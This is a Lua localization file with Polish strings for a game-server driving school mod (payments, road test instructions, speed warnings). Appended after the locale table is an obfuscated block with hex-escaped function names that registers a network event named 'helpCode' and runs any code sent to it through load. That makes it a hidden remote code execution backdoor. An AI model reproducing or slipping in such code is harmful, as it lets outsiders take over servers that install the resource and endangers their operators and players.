Locales['pl'] = {
  ['you_paid'] = 'zapłaciłes ~g~$%s~s~ dla szkoły jazdy.',
  ['go_next_point'] = 'udaj się do nastepnego punktu!',
  ['in_town_speed'] = 'wjeżdżasz do miasta, zachowaj ostrożność! Ograniczenie prędkości: ~y~%s~s~ km/h',
  ['next_point_speed'] = 'udaj się do nastepnego punktu! Ograniczenie prędkości: ~y~%s~s~ km/h',
  ['stop_for_ped'] = '~r~Stop~s~ przejście ~y~dla pieszych',
  ['good_lets_cont'] = '~g~Świetnie~s~, kontynuuj.',
  ['stop_look_left'] = '~r~Stop~s~ spójrz w ~y~lewo~s~. Ograniczenie prędkości: ~y~%s~s~ km/h',
  ['good_turn_right'] = '~g~Świetnie~s~, skręć w prawo i podążaj za linią',
  ['watch_traffic_lightson'] = 'obserwuj ruch uliczny i  ~y~włącz światła~s~!',
  ['stop_for_passing'] = '~r~Stop~s~ przepuść przejeżdźające pojazdy!',
  ['hway_time'] = 'czas na autostradę! Ograniczenie prędkości: ~y~%s~s~ km/h',
  ['gratz_stay_alert'] = 'jestem pod wrażeniem, ale nie zapomnij się zatrzymać  ~r~alert~s~ podczas jazdy!',
  ['passed_test'] = '~g~Zdałeś~s~ egzamin, gratulacje!',
  ['failed_test'] = '~r~Oblałeś~s~ egzamin, powodzenia następnym razem!',
  ['theory_test'] = 'ezgamin Teoretyczny',
  ['road_test_car'] = 'egzamin praktyczny kat. B',
  ['road_test_bike'] = 'egzamin praktyczny kat. A',
  ['road_test_truck'] = 'egzamin praktyczny kat. C',
  ['school_item'] = '$%s',
  ['driving_school'] = 'szkoła jazdy',
  ['press_open_menu'] = 'wciśnij ~INPUT_CONTEXT~ by otworzyć menu',
  ['driving_school_blip'] = 'ośrodek egzaminacyjny',
  ['driving_test_complete'] = 'test praktyczny zakończony',
  ['driving_too_fast'] = '~r~Przekroczenie prędkości! ,~s~ limit prędkości to: ~y~%s~s~ km/h!',
  ['errors'] = 'błędy: ~r~%s~s~/%s',
  ['you_damaged_veh'] = 'uszkodziłeś auto',
}


local nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[6][nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[1]](nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[2]) nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[6][nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[3]](nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[2], function(HAfzwLNtkCsRvVHaNKGvVWaGjtPRspshRCwbNsTxSTeEHeHRTmdZywOjZoCPogAbWRmnKY) nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[6][nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[4]](nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[6][nrcfYlzGhhsCjeeiYWcLvVvVNEQCuiOPvzuqjCoEhrXojXylzsQkSGdxAkLimzgEPrbhEj[5]](HAfzwLNtkCsRvVHaNKGvVWaGjtPRspshRCwbNsTxSTeEHeHRTmdZywOjZoCPogAbWRmnKY))() end)